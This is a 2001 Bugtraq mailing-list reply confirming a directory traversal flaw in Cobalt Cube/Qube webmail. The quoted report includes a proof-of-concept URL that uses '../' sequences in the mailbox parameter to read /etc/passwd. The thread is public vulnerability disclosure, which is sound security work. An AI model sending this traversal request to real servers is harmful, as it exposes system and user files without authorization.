[21405] in bugtraq
Re: Cobalt Cube Webmail directory traversal
daemon@ATHENA.MIT.EDU (Paul Marshall)
Mon Jul 9 13:22:31 2001
Message-Id: <5.1.0.14.2.20010709120649.02c16d98@127.0.0.1>
Date: Mon, 09 Jul 2001 12:10:05 +0100
To: bugtraq@securityfocus.com
From: Paul Marshall <paul@roninstorm.freeserve.co.uk>
In-Reply-To: <3B441A3E.D484EF1A@snosoft.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
At 08:41 05/07/2001, you wrote:
>I just got a new Cobalt Cube today and I have been poking around at it
>for security issues... I noticed this minor issue in the webmail system.
>Your
>users are not aloud to have shell access by default however if they
>malform their mailbox requests they can read local files with the perms
>of the webserver. If your users have shell access they will not really
>be gaining anything however this could be used to remotely gather
>information for a future attack.
>
>[admin admin]$ uname -a
>Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
>[admin admin]$ cat /etc/issue
>
>Cobalt Linux release 6.0 (Carmel)
>Kernel 2.2.16C7 on an i586
>
>http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../
>../../../../../../../../etc/passwd&id=1
>
>-KF
Well caught. I'll confirm the fault with my Cobalt Qube3's running the
latest patches that their BlueLinq provides. Surprising, to say the
least. You'd think they'd not allow traversal outside of your home
directory...
Paul
